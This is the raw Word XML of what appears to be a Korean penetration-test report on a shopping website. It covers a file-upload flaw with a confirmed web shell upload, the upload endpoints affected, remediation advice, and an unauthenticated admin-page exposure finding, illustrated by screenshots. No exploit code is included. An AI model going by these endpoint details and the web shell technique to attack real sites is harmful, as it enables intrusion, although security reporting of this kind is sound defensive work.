                <v:shape id="그림 48" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:13132;top:912;width:6073;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xswQAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X/A/LCF6KbtQaNLqKCIIUeqj14HHIjkkwOxuyo4n/vnso9Ph435td72r1pDZUng1MJwko4tzb&#10;igsDl5/jeAkqCLLF2jMZeFGA3XbwtsHM+o6/6XmWQsUQDhkaKEWaTOuQl+QwTHxDHLmbbx1KhG2h&#10;bYtdDHe1niVJqh1WHBtKbOhQUn4/P5wBf/10X5Ku9tViPpt36UKWp/eVMaNhv1+DEurlX/znPlkD&#10;H3Fs/BJ/gN7+AgAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAOIJjGzBAAAA2wAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;">
                  <v:imagedata r:id="rId86" o:title="" croptop="1476f" cropbottom="58290f" cropleft="20869f" cropright="36092f"/>
                </v:shape>
                <v:rect id="직사각형 49" o:spid="_x0000_s1029" style="position:absolute;left:11207;top:912;width:47244;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7LwwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bi8Iw&#10;FITvgv8hPGFvmlZEbTWKCILgQVY9eHw0z7bYvNQm1u7++o2w4HGYmW+Y5bozlWipcaVlBfEoAkGc&#10;WV1yruBy3g3nIJxH1lhZJgU/5GC96veWmGr74m9qTz4XAcIuRQWF93UqpcsKMuhGtiYO3s02Bn2Q&#10;TS51g68AN5UcR9FUGiw5LBRY07ag7H56GgXTw/Uex/tzMju0Zi5/H8nleEuU+hp0mwUIT53/hP/b&#10;e61gksD7S/gBcvUHAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAivtuy8MAAADbAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" fillcolor="#edf2fb" stroked="f" strokeweight="1pt"/>
                <v:shape id="그림 50" o:spid="_x0000_s1030" type="#_x0000_t75" style="position:absolute;left:11588;top:996;width:47010;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zEwQAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9NawIx&#10;EL0L/ocwQm+aVajY1SiiFHqQirbQehs3Y7K4mSybqFt/vTkIPT7e92zRukpcqQmlZwXDQQaCuPC6&#10;ZKPg++u9PwERIrLGyjMp+KMAi3m3M8Nc+xvv6LqPRqQQDjkqsDHWuZShsOQwDHxNnLiTbxzGBBsj&#10;dYO3FO4qOcqysXRYcmqwWNPKUnHeX5yC++7T4OY43prDOvycJvL37WC9Ui+9djkFEamN/+Kn+0Mr&#10;eE3r05f0A+T8AQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAJbWfMTBAAAA2wAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;">
                  <v:imagedata r:id="rId87" o:title=""/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2BB3A1" w14:textId="4075FC4F" w:rsidR="00E73B68" w:rsidRDefault="00BA7347" w:rsidP="00BA7347">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="450" w:name="_Toc20909465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78</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>업로드된 웹쉘 파일 작동 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="450"/>
    </w:p>
    <w:p w14:paraId="5E9FD8C9" w14:textId="7AC03543" w:rsidR="00E73B68" w:rsidRPr="00553E54" w:rsidRDefault="00E73B68" w:rsidP="00E73B68">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="321E8664" w14:textId="77777777" w:rsidR="00553E54" w:rsidRPr="00CB22A6" w:rsidRDefault="00553E54" w:rsidP="00553E54">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188"/>
        <w:gridCol w:w="4962"/>
      </w:tblGrid>
      <w:tr w:rsidR="00553E54" w:rsidRPr="00B112DB" w14:paraId="48BD3B2B" w14:textId="77777777" w:rsidTr="00041DFF">
        <w:trPr>
          <w:trHeight w:val="425"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58168B0F"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188" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73E1AB64"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962" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="33791F94"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C1FA5" w:rsidRPr="00B112DB" w14:paraId="7F554639"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E93C8A0" w14:textId="05A240B4" w:rsidR="009C1FA5" w:rsidRPr="00CB22A6" w:rsidRDefault="009C1FA5" w:rsidP="009C1FA5">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845A19" w14:textId="506801F8" w:rsidR="009C1FA5" w:rsidRPr="00CB22A6"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고객센터 &gt; QNA</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3E813EDC" w14:textId="5421E2B2" w:rsidR="009C1FA5" w:rsidRPr="00CB22A6" w:rsidRDefault="009C1FA5" w:rsidP="009C1FA5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00152C12">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/qna/openQnaWrite.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C1FA5" w:rsidRPr="00B112DB" w14:paraId="7E2B8D8C"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57403C7" w14:textId="6970A6D9" w:rsidR="009C1FA5" w:rsidRPr="00CB22A6" w:rsidRDefault="009C1FA5" w:rsidP="009C1FA5">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C1A190" w14:textId="062B61ED" w:rsidR="009C1FA5"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관리자 페이지 &gt; 상품 관리 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>&gt; 상품등록</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755FFAF5" w14:textId="3302A1B4" w:rsidR="009C1FA5" w:rsidRPr="00987A57" w:rsidRDefault="009C1FA5" w:rsidP="009C1FA5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00152C12">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/shop/openGoodsWrite.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C1FA5" w:rsidRPr="00B112DB" w14:paraId="4FBE6753"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06AA9AC" w14:textId="568EB5D1" w:rsidR="009C1FA5" w:rsidRPr="00CB22A6" w:rsidRDefault="009C1FA5" w:rsidP="009C1FA5">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FC0E16" w14:textId="3BE1E486" w:rsidR="009C1FA5"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관리자 페이지 &gt; 상품 관리 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>&gt; 수정</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3EB563B2" w14:textId="07024478" w:rsidR="009C1FA5" w:rsidRPr="00067A50" w:rsidRDefault="007E7C9B" w:rsidP="009C1FA5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00700AD2">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/shop/goodsModifyForm.do?type=modify&amp;IDX=</w:t>
            </w:r>
            <w:r w:rsidR="009C1FA5" w:rsidRPr="00DA36B7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>419</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E7C9B" w:rsidRPr="00B112DB" w14:paraId="3F8624E0"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58C1EB4" w14:textId="6BAB854A" w:rsidR="007E7C9B" w:rsidRPr="007E7C9B" w:rsidRDefault="007E7C9B" w:rsidP="007E7C9B">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82A227" w14:textId="2FFC4C2A" w:rsidR="007E7C9B" w:rsidRDefault="007E7C9B" w:rsidP="007E7C9B">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상품 &gt; 상품평 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>&gt; 글 작성</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1D9385F1" w14:textId="7D096D68" w:rsidR="007E7C9B" w:rsidRDefault="007E7C9B" w:rsidP="007E7C9B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003955B4">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/shop/openReviewForm.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67E2407F" w14:textId="77777777" w:rsidR="00553E54" w:rsidRDefault="00553E54" w:rsidP="00553E54">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DD14617" w14:textId="77777777" w:rsidR="00553E54" w:rsidRPr="00CB22A6" w:rsidRDefault="00553E54" w:rsidP="00553E54">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB22A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>해결방안</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B01BB5A" w14:textId="5B9DD957" w:rsidR="00700AD2" w:rsidRDefault="00EB08FC" w:rsidP="0096203F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r w:rsidRPr="00EB08FC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>파일</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB08FC">
        <w:t xml:space="preserve"> 확장자를 블랙리스트 방식으로 검증하는 경우 우회가 용이하므로, 허용된 확장자만 업로드할 수 있도록 화이트리스트 방식을 적용해야 합니다. 또한 서버 측에서 MIME 타입과 실제 파일 헤더를 함께 검증하여 이중 확인을 수행해야 하며, 업로드된 파일은 실행 권한이 없는 안전한 디렉터리에 저장해야 합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371FC9AB" w14:textId="68D3D110" w:rsidR="002C7F4C" w:rsidRDefault="00700AD2">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC01A2C" w14:textId="59B6A928" w:rsidR="00DF12B8" w:rsidRDefault="00186FBD" w:rsidP="00186FBD">
      <w:pPr>
        <w:pStyle w:val="Level3TitleCtl3"/>
      </w:pPr>
      <w:bookmarkStart w:id="451" w:name="_Toc209094569"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>관리자 페이지 노출</w:t>
      </w:r>
      <w:bookmarkEnd w:id="451"/>
    </w:p>
    <w:p w14:paraId="2DB9053E" w14:textId="77777777" w:rsidR="00DF12B8" w:rsidRDefault="00DF12B8" w:rsidP="00DF12B8">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>개요</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0AEDA5" w14:textId="5EC85374" w:rsidR="00DF12B8" w:rsidRPr="00B5070A" w:rsidRDefault="0082187D" w:rsidP="00DF12B8">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>일반 사용자가 접근</w:t>
      </w:r>
      <w:r w:rsidR="0043689B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>하면</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 안</w:t>
      </w:r>
      <w:r w:rsidR="00FC0530">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>되는 관리자 페이지나 중요 페이지가 추측</w:t>
      </w:r>
      <w:r w:rsidR="002F7FA9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">할 수 있는 </w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 되어 있거나 공개 네트워크에 노출되어 권한이 없는 사용자도 접근할 수 있는 취약점입니다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이는 접근 통제의 부재와 네트워크에 대한 제한이 없을 때 나타납니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744BAFC6" w14:textId="77777777" w:rsidR="00DF12B8" w:rsidRDefault="00DF12B8" w:rsidP="00DF12B8">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16A34128" w14:textId="77777777" w:rsidR="00DF12B8" w:rsidRPr="00CB22A6" w:rsidRDefault="00DF12B8" w:rsidP="00DF12B8">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>문제점</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016C5465" w14:textId="6CC7759F" w:rsidR="003F6E98" w:rsidRDefault="004E0CB0" w:rsidP="003F6E98">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E0CB0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>유추하기</w:t>
      </w:r>
      <w:r w:rsidRPr="004E0CB0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 쉬운 URL로 직접 접근 시 인증 없이 관리자 페이지 및 메뉴 접근이 가능한 취약점</w:t>
      </w:r>
      <w:r w:rsidR="00DC030A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이</w:t>
      </w:r>
      <w:r w:rsidRPr="004E0CB0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 발견되었습니다. 이는 관리자 권한 탈취와 민감 정보 노출 및 서비스 조작, 파괴 등의 위험이 있습니다</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580C0C0E" w14:textId="77777777" w:rsidR="003F6E98" w:rsidRDefault="003F6E98" w:rsidP="003F6E98">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F5861F7" w14:textId="33EE4CFB" w:rsidR="003F6E98" w:rsidRPr="003F6E98" w:rsidRDefault="005779AC" w:rsidP="003F6E98">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251841536" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="06660573" wp14:editId="2F4DBC66">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3755390</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>752475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="266609" cy="195943"/>
                <wp:effectExtent l="0" t="0" r="19685" b="13970"/>
                <wp:wrapNone/>
                <wp:docPr id="1293467088" name="직사각형 1293467088"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="266609" cy="1959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96974" id="직사각형 1293467088" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:295.7pt;margin-top:59.25pt;width:21pt;height:15.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FuAIAAKMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtu2zAQ3RfoHQjuG8mO7cRC5MBI4KJA&#10;kBhNiqxpirQEUCRL0pbdXXqHAr1BN130XEV6hw5JSTHSoIuiWlAkZ+YN583n7HxXC7RlxlZK5nhw&#10;lGLEJFVFJdc5/nC3eHOKkXVEFkQoyXK8Zxafz16/Omt0xoaqVKJgBgGItFmjc1w6p7MksbRkNbFH&#10;SjMJQq5MTRwczTopDGkAvRbJME0nSaNMoY2izFq4vYxCPAv4nDPqbji3zCGRY3ibC6sJ68qvyeyM&#10;ZGtDdFnR9hnkH15Rk0qC0x7qkjiCNqb6A6quqFFWcXdEVZ0ozivKQgwQzSB9Fs1tSTQLsQA5Vvc0&#10;2f8HS6+3S4OqAnI3nB6PJifpKWRMkhpy9fjt4fHz958/Hn59/YIOxMBZo20Gprd6adqTha0nYMdN&#10;7f8QGtoFnvc9z2znEIXL4WQySacYURANpuPp6NjnIXky1sa6t0zVyG9ybCCNgV2yvbIuqnYq3pdU&#10;i0oIuCeZkKjxoOk4DRZWiarwUi+0Zr26EAZtCVTDYpHC1zo+UINnCAmv8SHGoMLO7QWLDt4zDoT5&#10;MKIHX6qshyWUMukGUVSSgkVv40NnnUWIWUgA9MgcXtljtwCdZgTpsCMDrb43ZaHSe+M29L8Z9xbB&#10;s5KuN64rqcxLkQmIqvUc9TuSIjWepZUq9lBORsU+s5ouKsjgFbFuSQw0FrQgDAt3AwsXCjKl2h1G&#10;pTKfXrr3+lDvIMWogUbNsf24IYZhJN5J6ITpYDTynR0Oo/HJEA7mULI6lMhNfaEg+wMYS5qGrdd3&#10;ottyo+p7mClz7xVERFLwnWPqTHe4cHGAwFSibD4PatDNmrgreaupB/es+gq9290To9sydlD/16pr&#10;apI9q+ao6y2lmm+c4lUo9SdeW75hEoTCaaeWHzWH56D1NFtnvwEAAP//AwBQSwMEFAAGAAgAAAAh&#10;AISfmjzgAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj0FPg0AQhe8m/ofNmHizC5S2FFkaNTFG&#10;40Gr3rcwBdLdWcJuAf+940mP896XN+8Vu9kaMeLgO0cK4kUEAqlydUeNgs+Px5sMhA+aam0coYJv&#10;9LArLy8Kndduoncc96ERHEI+1wraEPpcSl+1aLVfuB6JvaMbrA58Do2sBz1xuDUyiaK1tLoj/tDq&#10;Hh9arE77s1Xw5k5Hab6S5GVz/5Rsnm02NeOrUtdX890tiIBz+IPhtz5Xh5I7HdyZai+MgtU2Thll&#10;I85WIJhYL5esHFhJtynIspD/N5Q/AAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAAT&#10;AAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/W&#10;AAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAL+QJQW4&#10;AgAAowUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAISf&#10;mjzgAAAACwEAAA8AAAAAAAAAAAAAAAAAEgUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMA&#10;AAAfBgAAAAA=&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BD0457F" wp14:editId="54416095">
            <wp:extent cx="4572000" cy="1959263"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="22225"/>
            <wp:docPr id="1293467087" name="그림 12934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r="1792" b="62588"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="19592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D38E14" w14:textId="61C83564" w:rsidR="00BE6966" w:rsidRDefault="003F6E98" w:rsidP="00BE6966">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="452" w:name="_Toc20909465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79</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">메인에서 </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>쿠폰</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>클릭</w:t>
      </w:r>
      <w:bookmarkEnd w:id="452"/>
    </w:p>
    <w:p w14:paraId="1618A3A0" w14:textId="77777777" w:rsidR="00BE6966" w:rsidRDefault="00BE6966" w:rsidP="00BE6966">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E301071" w14:textId="66AA2AD1" w:rsidR="00BE6966" w:rsidRPr="00BE6966" w:rsidRDefault="007A648B" w:rsidP="00BE6966">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251606016" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="29399062" wp14:editId="6B231190">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3826510</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2943225</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="628650" cy="152400"/>
                <wp:effectExtent l="0" t="0" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="1951474568" name="직사각형 1951474568"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
